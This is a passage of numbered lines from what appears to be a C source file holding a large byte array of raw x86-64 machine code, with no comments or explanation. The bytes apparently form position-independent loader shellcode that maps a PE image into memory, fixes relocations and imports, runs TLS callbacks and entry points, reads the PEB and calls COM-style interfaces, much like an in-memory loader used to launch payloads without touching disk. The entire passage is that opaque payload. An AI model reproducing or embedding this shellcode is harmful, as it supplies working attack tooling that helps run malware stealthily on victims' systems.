462 0xff, 0xff, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x55, 0x56, 0x57,
463 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0xac, 0x24,
464 0xe0, 0xfd, 0xff, 0xff, 0x48, 0x81, 0xec, 0x20, 0x03, 0x00, 0x00, 0x45,
465 0x33, 0xed, 0x33, 0xc0, 0x83, 0x3a, 0x02, 0x0f, 0x57, 0xc0, 0x4d, 0x8b,
466 0xf0, 0x4c, 0x89, 0x6c, 0x24, 0x50, 0x48, 0x8b, 0xf2, 0x48, 0x89, 0x45,
467 0x88, 0x45, 0x8d, 0x7d, 0x01, 0x66, 0x44, 0x89, 0xad, 0x68, 0x02, 0x00,
468 0x00, 0x48, 0x8b, 0xd9, 0x41, 0x8b, 0xfd, 0x0f, 0x11, 0x44, 0x24, 0x78,
469 0x0f, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x48, 0x28, 0x49, 0x8d,
470 0x50, 0x38, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x80, 0x00, 0x00, 0x00, 0x85,
471 0xc0, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x48,
472 0x8d, 0x54, 0x24, 0x50, 0x48, 0x8b, 0x01, 0xff, 0x90, 0x90, 0x00, 0x00,
473 0x00, 0x85, 0xc0, 0x0f, 0x88, 0x91, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4c,
474 0x24, 0x50, 0x4c, 0x8d, 0x44, 0x24, 0x48, 0x41, 0x8b, 0xd7, 0xff, 0x93,
475 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24, 0x50, 0x4c, 0x8d, 0x44,
476 0x24, 0x44, 0x41, 0x8b, 0xd7, 0xff, 0x93, 0xd0, 0x00, 0x00, 0x00, 0x8b,
477 0x44, 0x24, 0x44, 0x2b, 0x44, 0x24, 0x48, 0x41, 0x03, 0xc7, 0x0f, 0x84,
478 0x2e, 0x01, 0x00, 0x00, 0x41, 0x8d, 0x4d, 0x0c, 0x45, 0x8b, 0xc7, 0x33,
479 0xd2, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0x0c, 0x04,
480 0x00, 0x00, 0x33, 0xd2, 0x48, 0x8b, 0xf8, 0x45, 0x38, 0x28, 0x0f, 0x84,
481 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x41, 0xbf, 0x00, 0x01,
482 0x00, 0x00, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xc9, 0xff, 0x33,
483 0xc9, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54,
484 0x24, 0x40, 0x48, 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00,
485 0x44, 0x8b, 0x44, 0x24, 0x40, 0xb9, 0x08, 0x20, 0x00, 0x00, 0x66, 0x89,
486 0x4c, 0x24, 0x60, 0x33, 0xd2, 0x41, 0x8d, 0x4d, 0x08, 0x4c, 0x8b, 0xf8,
487 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xcd, 0x89, 0x8d, 0x78,
488 0x02, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x68, 0x44, 0x39, 0x6c, 0x24,
489 0x40, 0x0f, 0x86, 0x85, 0x00, 0x00, 0x00, 0x45, 0x8d, 0x65, 0x01, 0x49,
490 0x8b, 0x0c, 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
491 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
492 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00,
493 0x41, 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24,
494 0x40, 0x72, 0xcc, 0x45, 0x8b, 0xfc, 0xeb, 0x4e, 0xb9, 0x08, 0x20, 0x00,
495 0x00, 0x45, 0x8b, 0xc7, 0x66, 0x89, 0x4c, 0x24, 0x60, 0xb9, 0x08, 0x00,
496 0x00, 0x00, 0xff, 0x93, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x68,
497 0x02, 0x00, 0x00, 0x44, 0x89, 0xad, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
498 0x44, 0x24, 0x68, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4c,
499 0x24, 0x68, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xc0,
500 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xbf, 0x01, 0x00,
501 0x00, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x60, 0x44, 0x89, 0xad, 0x78, 0x02,
502 0x00, 0x00, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xcf,
503 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x38, 0x4c, 0x8d,
504 0x4d, 0xd8, 0xf2, 0x0f, 0x10, 0x4d, 0x88, 0x48, 0x8d, 0x55, 0xa0, 0x66,
505 0x44, 0x89, 0x7c, 0x24, 0x78, 0x4c, 0x8b, 0xc7, 0x4c, 0x89, 0x6d, 0x80,
506 0x0f, 0x10, 0x44, 0x24, 0x78, 0x48, 0x8b, 0x01, 0xf2, 0x0f, 0x11, 0x4d,
507 0xb0, 0x0f, 0x29, 0x45, 0xa0, 0xff, 0x90, 0x28, 0x01, 0x00, 0x00, 0x48,
508 0x85, 0xff, 0x0f, 0x84, 0xee, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4c, 0x24,
509 0x68, 0xff, 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
510 0xc0, 0x00, 0x00, 0x00, 0xe9, 0xd5, 0x01, 0x00, 0x00, 0x4d, 0x89, 0x6e,
511 0x38, 0xe9, 0xcc, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x0c, 0x02, 0x00,
512 0x00, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44,
513 0x89, 0x7c, 0x24, 0x28, 0x41, 0x83, 0xcc, 0xff, 0x48, 0x89, 0x44, 0x24,
514 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48,
515 0x8d, 0x4d, 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44,
516 0x24, 0x58, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x8b, 0x01,
517 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c,
518 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x45,
519 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x4d,
520 0x10, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xe8, 0x48, 0x85,
521 0xc0, 0x0f, 0x84, 0x44, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x28, 0x49,
522 0x8d, 0x46, 0x30, 0x4c, 0x8b, 0xc0, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8b,
523 0xd7, 0x4c, 0x8b, 0x09, 0x41, 0xff, 0x91, 0x88, 0x00, 0x00, 0x00, 0x44,
524 0x8b, 0xf0, 0x85, 0xc0, 0x0f, 0x88, 0x14, 0x01, 0x00, 0x00, 0x33, 0xff,
525 0x4c, 0x8d, 0x86, 0x0c, 0x04, 0x00, 0x00, 0x41, 0x38, 0x38, 0x0f, 0x84,
526 0xa6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x44, 0x89, 0x7c, 0x24,
527 0x28, 0x45, 0x8b, 0xcc, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33,
528 0xc9, 0xff, 0x53, 0x70, 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8d, 0x4d,
529 0x10, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x40,
530 0x8d, 0x4f, 0x0c, 0x33, 0xd2, 0x4c, 0x8b, 0xf8, 0xff, 0x93, 0xb0, 0x00,
531 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x64, 0x83, 0xa5,
532 0x78, 0x02, 0x00, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x40, 0x00, 0x76, 0x56,
533 0x33, 0xc9, 0x8d, 0x71, 0x08, 0x44, 0x8d, 0x61, 0x01, 0x49, 0x8b, 0x0c,
534 0xcf, 0xff, 0x93, 0xd8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0xc0, 0x66,
535 0x89, 0x75, 0xc0, 0x48, 0x8d, 0x95, 0x78, 0x02, 0x00, 0x00, 0x48, 0x89,
536 0x45, 0xc8, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xb8, 0x00, 0x00, 0x00, 0x44,
537 0x8b, 0xf0, 0x85, 0xc0, 0x79, 0x0b, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0xc0,
538 0x00, 0x00, 0x00, 0x33, 0xff, 0x8b, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x41,
539 0x03, 0xcc, 0x89, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x3b, 0x4c, 0x24, 0x40,
540 0x72, 0xb3, 0x45, 0x85, 0xf6, 0x78, 0x52, 0x48, 0x8b, 0x4d, 0x90, 0x48,
541 0x8d, 0x55, 0xf0, 0x48, 0x89, 0x54, 0x24, 0x30, 0x0f, 0x57, 0xc0, 0x48,
542 0x8d, 0x55, 0xa0, 0x0f, 0x29, 0x45, 0xa0, 0xf2, 0x0f, 0x10, 0x45, 0x88,
543 0x45, 0x33, 0xc9, 0x48, 0x8b, 0x09, 0x41, 0xb8, 0x18, 0x01, 0x00, 0x00,
544 0x48, 0x89, 0x7c, 0x24, 0x28, 0x48, 0x89, 0x54, 0x24, 0x20, 0x49, 0x8b,
545 0xd5, 0xf2, 0x0f, 0x11, 0x45, 0xb0, 0x48, 0x8b, 0x01, 0xff, 0x90, 0xc8,
546 0x01, 0x00, 0x00, 0x48, 0x85, 0xff, 0x74, 0x09, 0x48, 0x8b, 0xcf, 0xff,
547 0x93, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x49, 0x8b,
548 0xcd, 0xff, 0x93, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xff, 0x93,
549 0xe0, 0x00, 0x00, 0x00, 0x41, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x41, 0x8b,
550 0xc7, 0x48, 0x8b, 0x9c, 0x24, 0x60, 0x03, 0x00, 0x00, 0x48, 0x81, 0xc4,
551 0x20, 0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c,
552 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x89, 0x54, 0x24, 0x10, 0x53, 0x55, 0x56,
553 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec,
554 0x58, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0xaa, 0x28, 0x05, 0x00, 0x00, 0x48,
555 0x8b, 0xf1, 0x49, 0x63, 0x7d, 0x3c, 0x45, 0x33, 0xe4, 0x49, 0x03, 0xfd,
556 0x4c, 0x89, 0xa4, 0x24, 0xb8, 0x02, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x89,
557 0xbc, 0x24, 0xa0, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0xfa, 0x4c, 0x89, 0x6c,
558 0x24, 0x30, 0xff, 0x56, 0x40, 0x48, 0x89, 0x84, 0x24, 0xb0, 0x02, 0x00,
559 0x00, 0x4c, 0x63, 0x40, 0x3c, 0x45, 0x0f, 0xb7, 0x4c, 0x00, 0x04, 0x66,
560 0x44, 0x39, 0x4f, 0x04, 0x0f, 0x85, 0x0b, 0x04, 0x00, 0x00, 0x8b, 0x57,
561 0x50, 0x45, 0x8d, 0x4c, 0x24, 0x40, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x33,
562 0xc9, 0x03, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xff, 0x56, 0x48,
563 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe5, 0x03, 0x00, 0x00,
564 0x44, 0x8b, 0x47, 0x54, 0x49, 0x8b, 0xd5, 0x48, 0x8b, 0xc8, 0xe8, 0xe1,
565 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x6f, 0x14, 0x45, 0x8b, 0xf4, 0x48, 0x03,
566 0xef, 0x66, 0x44, 0x3b, 0x67, 0x06, 0x73, 0x2d, 0x41, 0x8b, 0xc6, 0x4c,
567 0x8d, 0x04, 0x80, 0x42, 0x8b, 0x54, 0xc5, 0x2c, 0x42, 0x8b, 0x4c, 0xc5,
568 0x24, 0x49, 0x03, 0xd5, 0x46, 0x8b, 0x44, 0xc5, 0x28, 0x48, 0x03, 0xcb,
569 0xe8, 0xaf, 0x0e, 0x00, 0x00, 0x0f, 0xb7, 0x47, 0x06, 0x41, 0xff, 0xc6,
570 0x44, 0x3b, 0xf0, 0x72, 0xd3, 0x8b, 0x87, 0xb0, 0x00, 0x00, 0x00, 0x85,
571 0xc0, 0x74, 0x76, 0x4c, 0x8b, 0xf3, 0x4c, 0x8d, 0x0c, 0x03, 0x4c, 0x2b,
572 0x77, 0x30, 0x45, 0x39, 0x21, 0x74, 0x66, 0xbd, 0x00, 0x10, 0x00, 0x00,
573 0x4d, 0x8d, 0x51, 0x08, 0xeb, 0x47, 0x41, 0x0f, 0xb7, 0x02, 0xb9, 0x00,
574 0xf0, 0x00, 0x00, 0x44, 0x0f, 0xb7, 0xd8, 0x66, 0x23, 0xc1, 0xb9, 0x00,
575 0xa0, 0x00, 0x00, 0x66, 0x3b, 0xc1, 0x75, 0x1f, 0x45, 0x8b, 0x01, 0x41,
576 0x81, 0xe3, 0xff, 0x0f, 0x00, 0x00, 0x4b, 0x8d, 0x04, 0x03, 0x48, 0x8b,
577 0x14, 0x18, 0x4b, 0x8d, 0x04, 0x03, 0x49, 0x03, 0xd6, 0x48, 0x89, 0x14,
578 0x18, 0xeb, 0x0a, 0x66, 0x44, 0x3b, 0xdd, 0x0f, 0x83, 0x22, 0x03, 0x00,
579 0x00, 0x49, 0x83, 0xc2, 0x02, 0x41, 0x8b, 0x41, 0x04, 0x49, 0x03, 0xc1,
580 0x4c, 0x3b, 0xd0, 0x75, 0xad, 0x4d, 0x8b, 0xca, 0x45, 0x39, 0x22, 0x75,
581 0x9f, 0x8b, 0x87, 0x90, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x98,
582 0x00, 0x00, 0x00, 0x48, 0x8d, 0x2c, 0x03, 0x8b, 0x45, 0x0c, 0x85, 0xc0,
583 0x0f, 0x84, 0x89, 0x00, 0x00, 0x00, 0x8b, 0xc8, 0x48, 0x03, 0xcb, 0xff,
584 0x56, 0x30, 0x44, 0x8b, 0x75, 0x00, 0x48, 0x8b, 0xf8, 0x44, 0x8b, 0x6d,
585 0x10, 0x4c, 0x03, 0xf3, 0x4c, 0x03, 0xeb, 0xeb, 0x4c, 0x79, 0x0b, 0x0f,
586 0xb7, 0xd1, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0xeb, 0x33, 0x41, 0x83,
587 0x7f, 0x04, 0x00, 0x4c, 0x8d, 0x24, 0x19, 0x74, 0x1a, 0x49, 0x8d, 0x54,
588 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xca, 0xf2, 0xff, 0xff, 0x85, 0xc0,
589 0x74, 0x09, 0x48, 0x8b, 0x86, 0x80, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x49,
590 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xcf, 0xff, 0x56, 0x38, 0x45, 0x33,
591 0xe4, 0x49, 0x83, 0xc6, 0x08, 0x49, 0x89, 0x45, 0x00, 0x49, 0x83, 0xc5,
592 0x08, 0x49, 0x8b, 0x0e, 0x48, 0x85, 0xc9, 0x75, 0xac, 0x8b, 0x45, 0x20,
593 0x48, 0x83, 0xc5, 0x14, 0x85, 0xc0, 0x75, 0x86, 0x48, 0x8b, 0xbc, 0x24,
594 0xa0, 0x02, 0x00, 0x00, 0x4d, 0x8d, 0xaf, 0x28, 0x05, 0x00, 0x00, 0x8b,
595 0x87, 0xf0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x72, 0x4c, 0x8d, 0x73,
596 0x04, 0x4c, 0x03, 0xf0, 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x74, 0x64, 0x8b,
597 0xc8, 0x48, 0x03, 0xcb, 0xff, 0x56, 0x30, 0x4c, 0x8b, 0xe0, 0x48, 0x85,
598 0xc0, 0x74, 0x3e, 0x45, 0x8b, 0x7e, 0x0c, 0x41, 0x8b, 0x6e, 0x08, 0x4c,
599 0x03, 0xfb, 0x48, 0x03, 0xeb, 0xeb, 0x26, 0x48, 0x8b, 0x46, 0x38, 0x48,
600 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xd1, 0xeb, 0x07, 0x48, 0x8d, 0x53,
601 0x02, 0x48, 0x03, 0xd1, 0x49, 0x8b, 0xcc, 0xff, 0xd0, 0x49, 0x83, 0xc7,
602 0x08, 0x48, 0x89, 0x45, 0x00, 0x48, 0x83, 0xc5, 0x08, 0x49, 0x8b, 0x0f,
603 0x48, 0x85, 0xc9, 0x75, 0xd2, 0x49, 0x83, 0xc6, 0x20, 0x45, 0x33, 0xe4,
604 0x41, 0x8b, 0x06, 0x85, 0xc0, 0x75, 0xa4, 0x4c, 0x8b, 0xbc, 0x24, 0xa8,
605 0x02, 0x00, 0x00, 0x8b, 0x87, 0xd0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74,
606 0x24, 0x4c, 0x8b, 0x74, 0x18, 0x18, 0x4d, 0x85, 0xf6, 0x74, 0x1a, 0xeb,
607 0x10, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xcb, 0x41, 0x8d, 0x50, 0x01, 0xff,
608 0xd0, 0x4d, 0x8d, 0x76, 0x08, 0x49, 0x8b, 0x06, 0x48, 0x85, 0xc0, 0x75,
609 0xe8, 0x8b, 0x6f, 0x28, 0x48, 0x03, 0xeb, 0x41, 0x83, 0x3f, 0x03, 0x0f,
610 0x85, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8c, 0x24, 0xb0, 0x02, 0x00,
611 0x00, 0x45, 0x33, 0xc0, 0x41, 0x8d, 0x50, 0x01, 0xff, 0xd5, 0x49, 0x8d,
612 0x97, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x89, 0x94, 0x24, 0xa0, 0x02, 0x00,
613 0x00, 0x44, 0x38, 0x22, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0x8b, 0x87,
614 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x73, 0x01, 0x00, 0x00,
615 0x48, 0x03, 0xc3, 0x8b, 0x68, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x65, 0x01,
616 0x00, 0x00, 0x44, 0x8b, 0x70, 0x1c, 0x44, 0x8b, 0x60, 0x20, 0x4c, 0x03,
617 0xf3, 0x44, 0x8b, 0x78, 0x24, 0x4c, 0x03, 0xe3, 0x4c, 0x03, 0xfb, 0xff,
618 0xcd, 0x41, 0x8b, 0x0c, 0xac, 0x48, 0x03, 0xcb, 0xe8, 0x97, 0x0c, 0x00,
619 0x00, 0x85, 0xc0, 0x74, 0x0e, 0x85, 0xed, 0x74, 0x18, 0x48, 0x8b, 0x94,
620 0x24, 0xa0, 0x02, 0x00, 0x00, 0xeb, 0xe0, 0x41, 0x0f, 0xb7, 0x04, 0x6f,
621 0x45, 0x8b, 0x34, 0x86, 0x4c, 0x03, 0xf3, 0xeb, 0x08, 0x4c, 0x8b, 0xb4,
622 0x24, 0xb8, 0x02, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48,
623 0x8b, 0xcb, 0xe8, 0x45, 0x0c, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33,
624 0xd2, 0x48, 0x8b, 0x4c, 0x24, 0x30, 0xe8, 0x35, 0x0c, 0x00, 0x00, 0x4d,
625 0x85, 0xf6, 0x0f, 0x84, 0xf3, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xac, 0x24,
626 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80,
627 0x3f, 0x00, 0x74, 0x43, 0x8b, 0x85, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0,
628 0x74, 0x26, 0x48, 0x8d, 0x44, 0x24, 0x40, 0xc7, 0x44, 0x24, 0x28, 0x00,
629 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20,
630 0x4c, 0x8b, 0xc7, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x8b, 0x85,
631 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x48,
632 0x0f, 0x44, 0xcf, 0x41, 0xff, 0xd6, 0xe9, 0x9c, 0x00, 0x00, 0x00, 0x41,
633 0xff, 0xd6, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x4d, 0x8d, 0x87, 0x0c, 0x04,
634 0x00, 0x00, 0x45, 0x38, 0x20, 0x74, 0x2a, 0x48, 0x8d, 0x44, 0x24, 0x40,
635 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff,
636 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70,
637 0x48, 0x8d, 0x54, 0x24, 0x40, 0x48, 0x8b, 0xce, 0xe8, 0x7f, 0x03, 0x00,
638 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x48, 0x8b, 0xcb, 0xe8, 0x89,
639 0x0b, 0x00, 0x00, 0x44, 0x8b, 0x47, 0x54, 0x33, 0xd2, 0x49, 0x8b, 0xcd,
640 0xe8, 0x7b, 0x0b, 0x00, 0x00, 0x45, 0x39, 0x67, 0x04, 0x74, 0x2d, 0x4c,
641 0x89, 0x64, 0x24, 0x28, 0x45, 0x33, 0xc9, 0x4c, 0x8b, 0xc5, 0x44, 0x89,
642 0x64, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x88, 0x00, 0x00,
643 0x00, 0x48, 0x85, 0xc0, 0x74, 0x1d, 0x83, 0xca, 0xff, 0x48, 0x8b, 0xc8,
644 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0xeb, 0x0f, 0x65, 0x48, 0x8b, 0x0c,
645 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x49, 0x60, 0xff, 0xd5, 0x33,
646 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0xff, 0x56,
647 0x50, 0x48, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
648 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
649 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x20, 0x55, 0x57,
650 0x41, 0x56, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0xfc, 0xff, 0xff, 0x48, 0x81,
651 0xec, 0x40, 0x04, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf1, 0x48,
652 0x8b, 0x91, 0x18, 0x09, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
653 0x33, 0xc9, 0x48, 0x8d, 0x14, 0x55, 0x02, 0x00, 0x00, 0x00, 0x44, 0x8d,
654 0x49, 0x04, 0xff, 0x56, 0x48, 0x4c, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x0f,
655 0x84, 0x94, 0x02, 0x00, 0x00, 0x8b, 0x8b, 0x24, 0x05, 0x00, 0x00, 0x4c,
656 0x8d, 0x83, 0x28, 0x05, 0x00, 0x00, 0x03, 0xc9, 0x83, 0xcb, 0xff, 0x89,
657 0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
658 0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
659 0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
660 0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x94, 0xe3, 0xff, 0xff,
661 0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x19,
662 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x76, 0xe2,
663 0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xf3, 0xe2, 0xff,
664 0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x70, 0xe2, 0xff, 0xff,
665 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x61, 0xe2, 0xff, 0xff, 0x48,
666 0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x56, 0xe2, 0xff, 0xff, 0x48, 0x89,
667 0x45, 0xb0, 0x48, 0x8d, 0x05, 0x4b, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45,
668 0xb8, 0x48, 0x8d, 0x05, 0xd8, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
669 0x48, 0x8d, 0x05, 0x35, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
670 0x8d, 0x05, 0x2a, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
671 0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0xb2, 0xe1,
672 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x96, 0xe1,
673 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xf2, 0xe1,
674 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x86, 0xe1,
675 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x7a, 0xe1,
676 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
677 0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x9c, 0xeb, 0xff, 0xff,
678 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x48, 0x01, 0x00, 0x00, 0x85, 0xc0,
679 0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
680 0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x94, 0x06, 0x00, 0x00, 0x48, 0x89,
681 0x44, 0x24, 0x20, 0x48, 0x8d, 0x8e, 0x74, 0x06, 0x00, 0x00, 0x44, 0x8d,
682 0x43, 0x04, 0xff, 0x96, 0x50, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85,
683 0x1e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48,
684 0x8d, 0x96, 0xd4, 0x06, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x70, 0x03, 0x00,
685 0x00, 0x48, 0x8b, 0x01, 0xff, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0xe2, 0x00,
686 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01,
687 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48,
688 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89,
